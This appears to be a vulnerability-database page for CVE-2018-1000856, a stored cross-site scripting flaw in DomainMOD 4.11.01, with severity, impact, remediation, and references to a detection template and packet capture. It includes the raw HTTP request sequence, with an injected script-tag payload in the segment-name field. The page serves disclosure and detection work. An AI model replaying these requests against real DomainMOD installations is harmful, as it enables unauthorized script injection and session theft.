🔙 목록으로 돌아가기

CVE-2018-1000856: DomainMOD 4.11.01 - Cross-Site Scripting

TitleDomainMOD 4.11.01 - Cross-Site Scripting
Authorarafatansari
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
RemediationUpgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.
CVSS Score4.8
EPSS Score0.0104
CVE IDCVE-2018-1000856
CWE IDCWE-79
Tags cve2018 cve domainmod xss authenticated vuln

🔍 Vulnerability Description

DomainMOD 4.11.01 is vulnerable to cross-site scripting via the segments/add.php Segment Name field.

🌐 HTTP Request

POST / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Content-Length: 39
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

new_username=Bv8mRt&new_password=HIZ1Cl
POST /segments/add.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.8
Connection: close
Content-Length: 109
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

new_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=test.com&new_description=test&new_notes=test
GET /segments/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-1000856.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-1000856.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A